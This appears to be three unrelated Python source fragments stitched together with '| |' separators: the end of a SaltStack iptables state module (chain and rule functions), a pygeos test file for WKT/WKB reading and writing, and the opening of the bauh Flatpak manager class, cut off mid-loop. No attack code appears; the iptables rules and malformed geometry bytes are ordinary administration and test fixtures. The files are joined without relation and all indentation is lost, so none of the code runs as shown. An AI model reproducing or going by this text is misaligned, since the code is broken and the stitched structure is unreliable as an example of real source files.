- chain: INPUT
- jump: ACCEPT
- match: state
- connstate: NEW
- dport: 80
- proto: tcp
- sport: 1025:65535
- save: True
httpd:
iptables.delete:
- position: 1
- table: filter
- chain: INPUT
- jump: ACCEPT
- match: state
- connstate: NEW
- dport: 80
- proto: tcp
- sport: 1025:65535
- save: True
httpd:
iptables.delete:
- table: filter
- family: ipv6
- chain: INPUT
- jump: ACCEPT
- match: state
- connstate: NEW
- dport: 80
- proto: tcp
- sport: 1025:65535
- save: True
'''
# Import salt libs
from salt.state import STATE_INTERNAL_KEYWORDS as _STATE_INTERNAL_KEYWORDS
def __virtual__():
'''
Only load if the locale module is available in __salt__
'''
return 'iptables.version' in __salt__
def chain_present(name, table='filter', family='ipv4'):
'''
.. versionadded:: 2014.1.0 (Hydrogen)
Verify the chain is exist.
name
A user-defined chain name.
table
The table to own the chain.
family
Networking family, either ipv4 or ipv6
'''
ret = {'name': name,
'changes': {},
'result': None,
'comment': ''}
chain_check = __salt__['iptables.check_chain'](table, name, family)
if chain_check is True:
ret['result'] = True
ret['comment'] = ('iptables {0} chain is already exist in {1} table for {2}'
.format(name, table, family))
return ret
if __opts__['test']:
ret['comment'] = 'iptables {0} chain in {1} table needs to be set for {2}'.format(
name,
table,
family)
return ret
command = __salt__['iptables.new_chain'](table, name, family)
if command is True:
ret['changes'] = {'locale': name}
ret['result'] = True
ret['comment'] = ('iptables {0} chain in {1} table create success for {2}'
.format(name, table, family))
return ret
else:
ret['result'] = False
ret['comment'] = 'Failed to create {0} chain in {1} table: {2} for {3}'.format(
name,
table,
command.strip(),
family
)
return ret
def chain_absent(name, table='filter', family='ipv4'):
'''
.. versionadded:: 2014.1.0 (Hydrogen)
Verify the chain is absent.
family
Networking family, either ipv4 or ipv6
'''
ret = {'name': name,
'changes': {},
'result': None,
'comment': ''}
chain_check = __salt__['iptables.check_chain'](table, name, family)
if not chain_check:
ret['result'] = True
ret['comment'] = ('iptables {0} chain is already absent in {1} table for {2}'
.format(name, table, family))
return ret
if __opts__['test']:
ret['comment'] = 'iptables {0} chain in {1} table needs to be removed {2}'.format(
name,
table,
family)
return ret
flush_chain = __salt__['iptables.flush'](table, name, family)
if not flush_chain:
command = __salt__['iptables.delete_chain'](table, name, family)
if command is True:
ret['changes'] = {'locale': name}
ret['result'] = True
ret['comment'] = ('iptables {0} chain in {1} table delete success for {2}'
.format(name, table, family))
else:
ret['result'] = False
ret['comment'] = ('Failed to delete {0} chain in {1} table: {2} for {3}'
.format(name, table, command.strip(), family))
else:
ret['result'] = False
ret['comment'] = 'Failed to flush {0} chain in {1} table: {2} for {3}'.format(
name,
table,
flush_chain.strip(),
family
)
return ret
def append(name, family='ipv4', **kwargs):
'''
.. versionadded:: 0.17.0
Append a rule to a chain
name
A user-defined name to call this rule by in another part of a state or
formula. This should not be an actual rule.
family
Network family, ipv4 or ipv6.
All other arguments are passed in with the same name as the long option
that would normally be used for iptables, with one exception: `--state` is
specified as `connstate` instead of `state` (not to be confused with
`ctstate`).
'''
ret = {'name': name,
'changes': {},
'result': None,
'comment': ''}
for ignore in _STATE_INTERNAL_KEYWORDS:
if ignore in kwargs:
del kwargs[ignore]
rule = __salt__['iptables.build_rule'](family=family, **kwargs)
command = __salt__['iptables.build_rule'](full='True', family=family, command='A', **kwargs)
if __salt__['iptables.check'](kwargs['table'],
kwargs['chain'],
rule,
family) is True:
ret['result'] = True
ret['comment'] = 'iptables rule for {0} already set ({1}) for {2}'.format(
name,
command.strip(),
family)
return ret
if __opts__['test']:
ret['comment'] = 'iptables rule for {0} needs to be set ({1}) for {2}'.format(
name,
command.strip(),
family)
return ret
if __salt__['iptables.append'](kwargs['table'], kwargs['chain'], rule, family):
ret['changes'] = {'locale': name}
ret['result'] = True
ret['comment'] = 'Set iptables rule for {0} to: {1} for {2}'.format(
name,
command.strip(),
family)
if 'save' in kwargs:
if kwargs['save']:
__salt__['iptables.save'](filename=None, family=family)
ret['comment'] = ('Set and Saved iptables rule for {0} to: '
'{1} for {2}'.format(name, command.strip(), family))
return ret
else:
ret['result'] = False
ret['comment'] = ('Failed to set iptables rule for {0}.\n'
'Attempted rule was {1} for {2}').format(
name,
command.strip(), family)
return ret
def insert(name, family='ipv4', **kwargs):
'''
.. versionadded:: 2014.1.0 (Hydrogen)
Insert a rule into a chain
name
A user-defined name to call this rule by in another part of a state or
formula. This should not be an actual rule.
family
Networking family, either ipv4 or ipv6
All other arguments are passed in with the same name as the long option
that would normally be used for iptables, with one exception: `--state` is
specified as `connstate` instead of `state` (not to be confused with
`ctstate`).
'''
ret = {'name': name,
'changes': {},
'result': None,
'comment': ''}
for ignore in _STATE_INTERNAL_KEYWORDS:
if ignore in kwargs:
del kwargs[ignore]
rule = __salt__['iptables.build_rule'](family=family, **kwargs)
command = __salt__['iptables.build_rule'](full=True, family=family, command='I', **kwargs)
if __salt__['iptables.check'](kwargs['table'],
kwargs['chain'],
rule,
family) is True:
ret['result'] = True
ret['comment'] = 'iptables rule for {0} already set for {1} ({2})'.format(
name,
family,
command.strip())
return ret
if __opts__['test']:
ret['comment'] = 'iptables rule for {0} needs to be set for {1} ({2})'.format(
name,
family,
command.strip())
return ret
if not __salt__['iptables.insert'](kwargs['table'], kwargs['chain'], kwargs['position'], rule, family):
ret['changes'] = {'locale': name}
ret['result'] = True
ret['comment'] = 'Set iptables rule for {0} to: {1} for {2}'.format(
name,
command.strip(),
family)
if 'save' in kwargs:
if kwargs['save']:
__salt__['iptables.save'](filename=None, family=family)
ret['comment'] = ('Set and Saved iptables rule for {0} to: '
'{1} for {2}').format(name, command.strip(), family)
return ret
else:
ret['result'] = False
ret['comment'] = ('Failed to set iptables rule for {0}.\n'
'Attempted rule was {1}').format(
name,
command.strip())
return ret
def delete(name, family='ipv4', **kwargs):
'''
.. versionadded:: 2014.1.0 (Hydrogen)
Delete a rule to a chain
name
A user-defined name to call this rule by in another part of a state or
formula. This should not be an actual rule.
family
Networking family, either ipv4 or ipv6
All other arguments are passed in with the same name as the long option
that would normally be used for iptables, with one exception: `--state` is
specified as `connstate` instead of `state` (not to be confused with
`ctstate`).
'''
ret = {'name': name,
'changes': {},
'result': None,
'comment': ''}
for ignore in _STATE_INTERNAL_KEYWORDS:
if ignore in kwargs:
del kwargs[ignore]
rule = __salt__['iptables.build_rule'](family=family, **kwargs)
command = __salt__['iptables.build_rule'](full=True, family=family, command='D', **kwargs)
if not __salt__['iptables.check'](kwargs['table'],
kwargs['chain'],
rule,
family) is True:
ret['result'] = True
ret['comment'] = 'iptables rule for {0} already absent for {1} ({2})'.format(
name,
family,
command.strip())
return ret
if __opts__['test']:
ret['comment'] = 'iptables rule for {0} needs to be deleted for {1} ({2})'.format(
name,
family,
command.strip())
return ret
if 'position' in kwargs:
result = __salt__['iptables.delete'](
kwargs['table'],
kwargs['chain'],
family=family,
position=kwargs['position'])
| |
import pickle
import struct
from unittest import mock
import numpy as np
import pytest
import pygeos
from .common import all_types, empty_point, point, point_z
# fmt: off
POINT11_WKB = b"\x01\x01\x00\x00\x00" + struct.pack("<2d", 1.0, 1.0)
NAN = struct.pack("<d", float("nan"))
POINT_NAN_WKB = b'\x01\x01\x00\x00\x00' + (NAN * 2)
POINTZ_NAN_WKB = b'\x01\x01\x00\x00\x80' + (NAN * 3)
MULTIPOINT_NAN_WKB = b'\x01\x04\x00\x00\x00\x01\x00\x00\x00\x01\x01\x00\x00\x00' + (NAN * 2)
MULTIPOINTZ_NAN_WKB = b'\x01\x04\x00\x00\x80\x01\x00\x00\x00\x01\x01\x00\x00\x80' + (NAN * 3)
GEOMETRYCOLLECTION_NAN_WKB = b'\x01\x07\x00\x00\x00\x01\x00\x00\x00\x01\x01\x00\x00\x00' + (NAN * 2)
GEOMETRYCOLLECTIONZ_NAN_WKB = b'\x01\x07\x00\x00\x80\x01\x00\x00\x00\x01\x01\x00\x00\x80' + (NAN * 3)
NESTED_COLLECTION_NAN_WKB = b'\x01\x07\x00\x00\x00\x01\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00\x00\x01\x01\x00\x00\x00' + (NAN * 2)
NESTED_COLLECTIONZ_NAN_WKB = b'\x01\x07\x00\x00\x80\x01\x00\x00\x00\x01\x04\x00\x00\x80\x01\x00\x00\x00\x01\x01\x00\x00\x80' + (NAN * 3)
# fmt: on
class ShapelyGeometryMock:
def __init__(self, g):
self.g = g
self.__geom__ = g._ptr if hasattr(g, "_ptr") else g
@property
def __array_interface__(self):
# this should not be called
# (starting with numpy 1.20 it is called, but not used)
return np.array([1.0, 2.0]).__array_interface__
@property
def wkb(self):
return pygeos.to_wkb(self.g)
@property
def geom_type(self):
idx = pygeos.get_type_id(self.g)
return [
"None",
"Point",
"LineString",
"LinearRing",
"Polygon",
"MultiPoint",
"MultiLineString",
"MultiPolygon",
"GeometryCollection",
][idx]
@property
def is_empty(self):
return pygeos.is_empty(self.g)
class ShapelyPreparedMock:
def __init__(self, g):
self.context = ShapelyGeometryMock(g)
def shapely_wkb_loads_mock(wkb):
geom = pygeos.from_wkb(wkb)
return ShapelyGeometryMock(geom)
def test_from_wkt():
expected = pygeos.points(1, 1)
actual = pygeos.from_wkt("POINT (1 1)")
assert pygeos.equals(actual, expected)
# also accept bytes
actual = pygeos.from_wkt(b"POINT (1 1)")
assert pygeos.equals(actual, expected)
def test_from_wkt_none():
# None propagates
assert pygeos.from_wkt(None) is None
def test_from_wkt_exceptions():
with pytest.raises(TypeError, match="Expected bytes, got int"):
pygeos.from_wkt(1)
with pytest.raises(
pygeos.GEOSException, match="Expected word but encountered end of stream"
):
pygeos.from_wkt("")
with pytest.raises(pygeos.GEOSException, match="Unknown type: 'NOT'"):
pygeos.from_wkt("NOT A WKT STRING")
def test_from_wkt_warn_on_invalid():
with pytest.warns(Warning, match="Invalid WKT"):
pygeos.from_wkt("", on_invalid="warn")
with pytest.warns(Warning, match="Invalid WKT"):
pygeos.from_wkt("NOT A WKT STRING", on_invalid="warn")
def test_from_wkb_ignore_on_invalid():
with pytest.warns(None):
pygeos.from_wkt("", on_invalid="ignore")
with pytest.warns(None):
pygeos.from_wkt("NOT A WKT STRING", on_invalid="ignore")
def test_from_wkt_on_invalid_unsupported_option():
with pytest.raises(ValueError, match="not a valid option"):
pygeos.from_wkt(b"\x01\x01\x00\x00\x00\x00", on_invalid="unsupported_option")
@pytest.mark.parametrize("geom", all_types)
def test_from_wkt_all_types(geom):
wkt = pygeos.to_wkt(geom)
actual = pygeos.from_wkt(wkt)
assert pygeos.equals(actual, geom)
@pytest.mark.parametrize(
"wkt",
("POINT EMPTY", "LINESTRING EMPTY", "POLYGON EMPTY", "GEOMETRYCOLLECTION EMPTY"),
)
def test_from_wkt_empty(wkt):
geom = pygeos.from_wkt(wkt)
assert pygeos.is_geometry(geom).all()
assert pygeos.is_empty(geom).all()
assert pygeos.to_wkt(geom) == wkt
def test_from_wkb():
expected = pygeos.points(1, 1)
actual = pygeos.from_wkb(POINT11_WKB)
assert pygeos.equals(actual, expected)
def test_from_wkb_hex():
# HEX form
expected = pygeos.points(1, 1)
actual = pygeos.from_wkb("0101000000000000000000F03F000000000000F03F")
assert pygeos.equals(actual, expected)
actual = pygeos.from_wkb(b"0101000000000000000000F03F000000000000F03F")
assert pygeos.equals(actual, expected)
def test_from_wkb_none():
# None propagates
assert pygeos.from_wkb(None) is None
def test_from_wkb_exceptions():
with pytest.raises(TypeError, match="Expected bytes, got int"):
pygeos.from_wkb(1)
# invalid WKB
with pytest.raises(pygeos.GEOSException, match="Unexpected EOF parsing WKB"):
result = pygeos.from_wkb(b"\x01\x01\x00\x00\x00\x00")
assert result is None
# invalid ring in WKB
with pytest.raises(
pygeos.GEOSException,
match="Invalid number of points in LinearRing found 3 - must be 0 or >= 4",
):
result = pygeos.from_wkb(
b"\x01\x03\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00P}\xae\xc6\x00\xb15A\x00\xde\x02I\x8e^=A0n\xa3!\xfc\xb05A\xa0\x11\xa5=\x90^=AP}\xae\xc6\x00\xb15A\x00\xde\x02I\x8e^=A"
)
assert result is None
def test_from_wkb_warn_on_invalid_warn():
# invalid WKB
with pytest.warns(Warning, match="Invalid WKB"):
result = pygeos.from_wkb(b"\x01\x01\x00\x00\x00\x00", on_invalid="warn")
assert result is None
# invalid ring in WKB
with pytest.warns(Warning, match="Invalid WKB"):
result = pygeos.from_wkb(
b"\x01\x03\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00P}\xae\xc6\x00\xb15A\x00\xde\x02I\x8e^=A0n\xa3!\xfc\xb05A\xa0\x11\xa5=\x90^=AP}\xae\xc6\x00\xb15A\x00\xde\x02I\x8e^=A",
on_invalid="warn",
)
assert result is None
def test_from_wkb_ignore_on_invalid_ignore():
# invalid WKB
with pytest.warns(None) as w:
result = pygeos.from_wkb(b"\x01\x01\x00\x00\x00\x00", on_invalid="ignore")
assert result is None
assert len(w) == 0 # no warning
# invalid ring in WKB
with pytest.warns(None) as w:
result = pygeos.from_wkb(
b"\x01\x03\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00P}\xae\xc6\x00\xb15A\x00\xde\x02I\x8e^=A0n\xa3!\xfc\xb05A\xa0\x11\xa5=\x90^=AP}\xae\xc6\x00\xb15A\x00\xde\x02I\x8e^=A",
on_invalid="ignore",
)
assert result is None
assert len(w) == 0 # no warning
def test_from_wkb_on_invalid_unsupported_option():
with pytest.raises(ValueError, match="not a valid option"):
pygeos.from_wkb(b"\x01\x01\x00\x00\x00\x00", on_invalid="unsupported_option")
@pytest.mark.parametrize("geom", all_types)
@pytest.mark.parametrize("use_hex", [False, True])
@pytest.mark.parametrize("byte_order", [0, 1])
def test_from_wkb_all_types(geom, use_hex, byte_order):
wkb = pygeos.to_wkb(geom, hex=use_hex, byte_order=byte_order)
actual = pygeos.from_wkb(wkb)
assert pygeos.equals(actual, geom)
@pytest.mark.parametrize(
"wkt",
("POINT EMPTY", "LINESTRING EMPTY", "POLYGON EMPTY", "GEOMETRYCOLLECTION EMPTY"),
)
def test_from_wkb_empty(wkt):
wkb = pygeos.to_wkb(pygeos.Geometry(wkt))
geom = pygeos.from_wkb(wkb)
assert pygeos.is_geometry(geom).all()
assert pygeos.is_empty(geom).all()
assert pygeos.to_wkb(geom) == wkb
def test_to_wkt():
point = pygeos.points(1, 1)
actual = pygeos.to_wkt(point)
assert actual == "POINT (1 1)"
actual = pygeos.to_wkt(point, trim=False)
assert actual == "POINT (1.000000 1.000000)"
actual = pygeos.to_wkt(point, rounding_precision=3, trim=False)
assert actual == "POINT (1.000 1.000)"
def test_to_wkt_3D():
# 3D points
point_z = pygeos.points(1, 1, 1)
actual = pygeos.to_wkt(point_z)
assert actual == "POINT Z (1 1 1)"
actual = pygeos.to_wkt(point_z, output_dimension=3)
assert actual == "POINT Z (1 1 1)"
actual = pygeos.to_wkt(point_z, output_dimension=2)
assert actual == "POINT (1 1)"
actual = pygeos.to_wkt(point_z, old_3d=True)
assert actual == "POINT (1 1 1)"
def test_to_wkt_none():
# None propagates
assert pygeos.to_wkt(None) is None
def test_to_wkt_exceptions():
with pytest.raises(TypeError):
pygeos.to_wkt(1)
with pytest.raises(pygeos.GEOSException):
pygeos.to_wkt(point, output_dimension=4)
def test_to_wkt_point_empty():
assert pygeos.to_wkt(empty_point) == "POINT EMPTY"
def test_to_wkt_geometrycollection_with_point_empty():
collection = pygeos.geometrycollections([empty_point, point])
# do not check the full value as some GEOS versions give
# GEOMETRYCOLLECTION Z (...) and others give GEOMETRYCOLLECTION (...)
assert pygeos.to_wkt(collection).endswith("(POINT EMPTY, POINT (2 3))")
def test_to_wkt_multipoint_with_point_empty_errors():
# Test if segfault is prevented
geom = pygeos.multipoints([empty_point, point])
with pytest.raises(ValueError):
pygeos.to_wkt(geom)
def test_repr():
assert repr(point) == "<pygeos.Geometry POINT (2 3)>"
def test_repr_max_length():
# the repr is limited to 80 characters
geom = pygeos.linestrings(np.arange(1000), np.arange(1000))
representation = repr(geom)
assert len(representation) == 80
assert representation.endswith("...>")
def test_repr_multipoint_with_point_empty():
# Test if segfault is prevented
geom = pygeos.multipoints([point, empty_point])
assert repr(geom) == "<pygeos.Geometry Exception in WKT writer>"
def test_to_wkb():
point = pygeos.points(1, 1)
actual = pygeos.to_wkb(point, byte_order=1)
assert actual == POINT11_WKB
def test_to_wkb_hex():
point = pygeos.points(1, 1)
actual = pygeos.to_wkb(point, hex=True, byte_order=1)
le = "01"
point_type = "01000000"
coord = "000000000000F03F" # 1.0 as double (LE)
assert actual == le + point_type + 2 * coord
def test_to_wkb_3D():
point_z = pygeos.points(1, 1, 1)
actual = pygeos.to_wkb(point_z, byte_order=1)
# fmt: off
assert actual == b"\x01\x01\x00\x00\x80\x00\x00\x00\x00\x00\x00\xf0?\x00\x00\x00\x00\x00\x00\xf0?\x00\x00\x00\x00\x00\x00\xf0?" # noqa
# fmt: on
actual = pygeos.to_wkb(point_z, output_dimension=2, byte_order=1)
assert actual == POINT11_WKB
def test_to_wkb_none():
# None propagates
assert pygeos.to_wkb(None) is None
def test_to_wkb_exceptions():
with pytest.raises(TypeError):
pygeos.to_wkb(1)
with pytest.raises(pygeos.GEOSException):
pygeos.to_wkb(point, output_dimension=4)
def test_to_wkb_byte_order():
point = pygeos.points(1.0, 1.0)
be = b"\x00"
le = b"\x01"
point_type = b"\x01\x00\x00\x00" # 1 as 32-bit uint (LE)
coord = b"\x00\x00\x00\x00\x00\x00\xf0?" # 1.0 as double (LE)
assert pygeos.to_wkb(point, byte_order=1) == le + point_type + 2 * coord
assert pygeos.to_wkb(point, byte_order=0) == be + point_type[::-1] + 2 * coord[::-1]
def test_to_wkb_srid():
# hex representation of POINT (0 0) with SRID=4
ewkb = "01010000200400000000000000000000000000000000000000"
wkb = "010100000000000000000000000000000000000000"
actual = pygeos.from_wkb(ewkb)
assert pygeos.to_wkt(actual, trim=True) == "POINT (0 0)"
assert pygeos.to_wkb(actual, hex=True, byte_order=1) == wkb
assert pygeos.to_wkb(actual, hex=True, include_srid=True, byte_order=1) == ewkb
point = pygeos.points(1, 1)
point_with_srid = pygeos.set_srid(point, np.int32(4326))
result = pygeos.to_wkb(point_with_srid, include_srid=True, byte_order=1)
assert np.frombuffer(result[5:9], "<u4").item() == 4326
@pytest.mark.skipif(
pygeos.geos_version >= (3, 8, 0), reason="Pre GEOS 3.8.0 has 3D empty points"
)
@pytest.mark.parametrize(
"geom,dims,expected",
[
(empty_point, 2, POINT_NAN_WKB),
(empty_point, 3, POINTZ_NAN_WKB),
(pygeos.multipoints([empty_point]), 2, MULTIPOINT_NAN_WKB),
(pygeos.multipoints([empty_point]), 3, MULTIPOINTZ_NAN_WKB),
(pygeos.geometrycollections([empty_point]), 2, GEOMETRYCOLLECTION_NAN_WKB),
(pygeos.geometrycollections([empty_point]), 3, GEOMETRYCOLLECTIONZ_NAN_WKB),
(
pygeos.geometrycollections([pygeos.multipoints([empty_point])]),
2,
NESTED_COLLECTION_NAN_WKB,
),
(
pygeos.geometrycollections([pygeos.multipoints([empty_point])]),
3,
NESTED_COLLECTIONZ_NAN_WKB,
),
],
)
def test_to_wkb_point_empty_pre_geos38(geom, dims, expected):
actual = pygeos.to_wkb(geom, output_dimension=dims, byte_order=1)
# Use numpy.isnan; there are many byte representations for NaN
assert actual[: -dims * 8] == expected[: -dims * 8]
assert np.isnan(struct.unpack("<{}d".format(dims), actual[-dims * 8 :])).all()
@pytest.mark.skipif(
pygeos.geos_version < (3, 8, 0), reason="Post GEOS 3.8.0 has 2D empty points"
)
@pytest.mark.parametrize(
"geom,dims,expected",
[
(empty_point, 2, POINT_NAN_WKB),
(empty_point, 3, POINT_NAN_WKB),
(pygeos.multipoints([empty_point]), 2, MULTIPOINT_NAN_WKB),
(pygeos.multipoints([empty_point]), 3, MULTIPOINT_NAN_WKB),
(pygeos.geometrycollections([empty_point]), 2, GEOMETRYCOLLECTION_NAN_WKB),
(pygeos.geometrycollections([empty_point]), 3, GEOMETRYCOLLECTION_NAN_WKB),
(
pygeos.geometrycollections([pygeos.multipoints([empty_point])]),
2,
NESTED_COLLECTION_NAN_WKB,
),
(
pygeos.geometrycollections([pygeos.multipoints([empty_point])]),
3,
NESTED_COLLECTION_NAN_WKB,
),
],
)
def test_to_wkb_point_empty_post_geos38(geom, dims, expected):
# Post GEOS 3.8: empty point is 2D
actual = pygeos.to_wkb(geom, output_dimension=dims, byte_order=1)
# Use numpy.isnan; there are many byte representations for NaN
assert actual[: -2 * 8] == expected[: -2 * 8]
assert np.isnan(struct.unpack("<2d", actual[-2 * 8 :])).all()
@pytest.mark.parametrize(
"wkb,expected_type",
[
(POINT_NAN_WKB, 0),
(POINTZ_NAN_WKB, 0),
(MULTIPOINT_NAN_WKB, 4),
(MULTIPOINTZ_NAN_WKB, 4),
(GEOMETRYCOLLECTION_NAN_WKB, 7),
(GEOMETRYCOLLECTIONZ_NAN_WKB, 7),
(NESTED_COLLECTION_NAN_WKB, 7),
(NESTED_COLLECTIONZ_NAN_WKB, 7),
],
)
def test_from_wkb_point_empty(wkb, expected_type):
geom = pygeos.from_wkb(wkb)
# POINT (nan nan) transforms to an empty point
# Note that the dimensionality (2D/3D) is GEOS-version dependent
assert pygeos.is_empty(geom)
assert pygeos.get_type_id(geom) == expected_type
def test_to_wkb_point_empty_srid():
expected = pygeos.set_srid(empty_point, 4236)
wkb = pygeos.to_wkb(expected, include_srid=True)
actual = pygeos.from_wkb(wkb)
assert pygeos.get_srid(actual) == 4236
@pytest.mark.parametrize("geom", all_types)
@mock.patch("pygeos.io.ShapelyGeometry", ShapelyGeometryMock)
@mock.patch("pygeos.io.ShapelyPreparedGeometry", ShapelyPreparedMock)
@mock.patch("pygeos.io.shapely_compatible", True)
@mock.patch("pygeos.io._shapely_checked", True)
def test_from_shapely(geom):
actual = pygeos.from_shapely(ShapelyGeometryMock(geom))
assert isinstance(actual, pygeos.Geometry)
assert pygeos.equals(geom, actual)
assert geom._ptr != actual._ptr
@pytest.mark.parametrize("geom", all_types)
@mock.patch("pygeos.io.ShapelyGeometry", ShapelyGeometryMock)
@mock.patch("pygeos.io.ShapelyPreparedGeometry", ShapelyPreparedMock)
@mock.patch("pygeos.io.shapely_compatible", True)
@mock.patch("pygeos.io._shapely_checked", True)
def test_from_shapely_prepared(geom):
actual = pygeos.from_shapely(ShapelyPreparedMock(geom))
assert isinstance(actual, pygeos.Geometry)
assert pygeos.equals(geom, actual)
assert geom._ptr != actual._ptr
@mock.patch("pygeos.io.ShapelyGeometry", ShapelyGeometryMock)
@mock.patch("pygeos.io.ShapelyPreparedGeometry", ShapelyPreparedMock)
@mock.patch("pygeos.io.shapely_compatible", True)
@mock.patch("pygeos.io._shapely_checked", True)
def test_from_shapely_arr():
actual = pygeos.from_shapely([ShapelyGeometryMock(point), None])
assert pygeos.equals(point, actual[0])
@mock.patch("pygeos.io.ShapelyGeometry", ShapelyGeometryMock)
@mock.patch("pygeos.io.ShapelyPreparedGeometry", ShapelyPreparedMock)
@mock.patch("pygeos.io.shapely_compatible", True)
@mock.patch("pygeos.io._shapely_checked", True)
def test_from_shapely_none():
actual = pygeos.from_shapely(None)
assert actual is None
@pytest.mark.parametrize("geom", [1, 2.3, "x", ShapelyGeometryMock(None)])
@mock.patch("pygeos.io.ShapelyGeometry", ShapelyGeometryMock)
@mock.patch("pygeos.io.ShapelyPreparedGeometry", ShapelyPreparedMock)
@mock.patch("pygeos.io.shapely_compatible", True)
@mock.patch("pygeos.io._shapely_checked", True)
def test_from_shapely_error(geom):
with pytest.raises(TypeError):
pygeos.from_shapely(geom)
@pytest.mark.parametrize("geom", all_types)
@mock.patch("pygeos.io.ShapelyGeometry", ShapelyGeometryMock)
@mock.patch("pygeos.io.ShapelyPreparedGeometry", ShapelyPreparedMock)
@mock.patch("pygeos.io.shapely_compatible", False)
@mock.patch("pygeos.io._shapely_checked", True)
def test_from_shapely_incompatible(geom):
actual = pygeos.from_shapely(ShapelyGeometryMock(geom))
assert isinstance(actual, pygeos.Geometry)
assert pygeos.equals(geom, actual)
assert geom._ptr != actual._ptr
@pytest.mark.parametrize("geom", all_types)
@mock.patch("pygeos.io.ShapelyGeometry", ShapelyGeometryMock)
@mock.patch("pygeos.io.ShapelyPreparedGeometry", ShapelyPreparedMock)
@mock.patch("pygeos.io.shapely_compatible", False)
@mock.patch("pygeos.io._shapely_checked", True)
def test_from_shapely_incompatible_prepared(geom):
actual = pygeos.from_shapely(ShapelyPreparedMock(geom))
assert isinstance(actual, pygeos.Geometry)
assert pygeos.equals(geom, actual)
assert geom._ptr != actual._ptr
@mock.patch("pygeos.io.ShapelyGeometry", ShapelyGeometryMock)
@mock.patch("pygeos.io.ShapelyPreparedGeometry", ShapelyPreparedMock)
@mock.patch("pygeos.io.shapely_compatible", False)
@mock.patch("pygeos.io._shapely_checked", True)
def test_from_shapely_incompatible_none():
actual = pygeos.from_shapely(None)
assert actual is None
@mock.patch("pygeos.io.ShapelyGeometry", ShapelyGeometryMock)
@mock.patch("pygeos.io.ShapelyPreparedGeometry", ShapelyPreparedMock)
@mock.patch("pygeos.io.shapely_compatible", False)
@mock.patch("pygeos.io._shapely_checked", True)
def | |
import os
import re
import traceback
from datetime import datetime
from math import floor
from pathlib import Path
from threading import Thread
from typing import List, Set, Type, Tuple, Optional
from bauh.api.abstract.controller import SearchResult, SoftwareManager, ApplicationContext, UpgradeRequirements, \
UpgradeRequirement, TransactionResult
from bauh.api.abstract.disk import DiskCacheLoader
from bauh.api.abstract.handler import ProcessWatcher, TaskManager
from bauh.api.abstract.model import PackageHistory, PackageUpdate, SoftwarePackage, PackageSuggestion, \
SuggestionPriority, PackageStatus
from bauh.api.abstract.view import MessageType, FormComponent, SingleSelectComponent, InputOption, SelectViewType, \
ViewComponent, PanelComponent
from bauh.commons import user, internet
from bauh.commons.config import save_config
from bauh.commons.html import strip_html, bold
from bauh.commons.system import ProcessHandler
from bauh.gems.flatpak import flatpak, SUGGESTIONS_FILE, CONFIG_FILE, UPDATES_IGNORED_FILE, CONFIG_DIR, EXPORTS_PATH
from bauh.gems.flatpak.config import read_config
from bauh.gems.flatpak.constants import FLATHUB_API_URL
from bauh.gems.flatpak.model import FlatpakApplication
from bauh.gems.flatpak.worker import FlatpakAsyncDataLoader, FlatpakUpdateLoader
DATE_FORMAT = '%Y-%m-%dT%H:%M:%S.000Z'
RE_INSTALL_REFS = re.compile(r'\d+\)\s+(.+)')
class FlatpakManager(SoftwareManager):
def __init__(self, context: ApplicationContext):
super(FlatpakManager, self).__init__(context=context)
self.i18n = context.i18n
self.api_cache = context.cache_factory.new()
self.category_cache = context.cache_factory.new()
context.disk_loader_factory.map(FlatpakApplication, self.api_cache)
self.enabled = True
self.http_client = context.http_client
self.suggestions_cache = context.cache_factory.new()
self.logger = context.logger
def get_managed_types(self) -> Set["type"]:
return {FlatpakApplication}
def _map_to_model(self, app_json: dict, installed: bool, disk_loader: DiskCacheLoader, internet: bool = True) -> FlatpakApplication:
app = FlatpakApplication(**app_json, i18n=self.i18n)
app.installed = installed
api_data = self.api_cache.get(app_json['id'])
expired_data = api_data and api_data.get('expires_at') and api_data['expires_at'] <= datetime.utcnow()
if not api_data or expired_data:
if not app.runtime:
if disk_loader:
disk_loader.fill(app) # preloading cached disk data
if internet:
FlatpakAsyncDataLoader(app=app, api_cache=self.api_cache, manager=self,
context=self.context, category_cache=self.category_cache).start()
else:
app.fill_cached_data(api_data)
app.status = PackageStatus.READY
return app
def _get_search_remote(self) -> str:
remotes = flatpak.list_remotes()
if remotes['system']:
remote_level = 'system'
elif remotes['user']:
remote_level = 'user'
else:
remote_level = 'user'
ProcessHandler().handle_simple(flatpak.set_default_remotes(remote_level))
return remote_level
def search(self, words: str, disk_loader: DiskCacheLoader, limit: int = -1, is_url: bool = False) -> SearchResult:
if is_url:
return SearchResult([], [], 0)
remote_level = self._get_search_remote()
res = SearchResult([], [], 0)
apps_found = flatpak.search(flatpak.get_version(), words, remote_level)
if apps_found:
already_read = set()
installed_apps = self.read_installed(disk_loader=disk_loader, internet_available=True).installed
if installed_apps:
for app_found in apps_found:
for installed_app in installed_apps:
if app_found['id'] == installed_app.id:
res.installed.append(installed_app)
already_read.add(app_found['id'])
if len(apps_found) > len(already_read):
for app_found in apps_found:
if app_found['id'] not in already_read:
res.new.append(self._map_to_model(app_found, False, disk_loader))
res.total = len(res.installed) + len(res.new)
return res
def _add_updates(self, version: str, output: list):
output.append(flatpak.list_updates_as_str(version))
def read_installed(self, disk_loader: DiskCacheLoader, limit: int = -1, only_apps: bool = False, pkg_types: Set[Type[SoftwarePackage]] = None, internet_available: bool = None) -> SearchResult:
version = flatpak.get_version()
updates = []
if internet_available:
thread_updates = Thread(target=self._add_updates, args=(version, updates))
thread_updates.start()
else:
thread_updates = None
installed = flatpak.list_installed(version)
models = []
if installed:
update_map = None
if thread_updates:
thread_updates.join()
update_map = updates[0]
for app_json in installed:
model = self._map_to_model(app_json=app_json, installed=True,
disk_loader=disk_loader, internet=internet_available)
model.update = None
models.append(model)
if update_map and (update_map['full'] or update_map['partial']):
if version >= '1.4.0':
update_id = '{}/{}/{}'.format(app_json['id'], app_json['branch'], app_json['installation'])
if update_map['full'] and update_id in update_map['full']:
model.update = True
if update_map['partial']:
for partial in update_map['partial']:
partial_data = partial.split('/')
if app_json['id'] in partial_data[0] and\
app_json['branch'] == partial_data[1] and\
app_json['installation'] == partial_data[2]:
partial_model = model.gen_partial(partial.split('/')[0])
partial_model.update = True
models.append(partial_model)
else:
model.update = '{}/{}'.format(app_json['installation'], app_json['ref']) in update_map['full']
if models:
ignored = self._read_ignored_updates()
if ignored:
for model in models:
if model.get_update_ignore_key() in ignored:
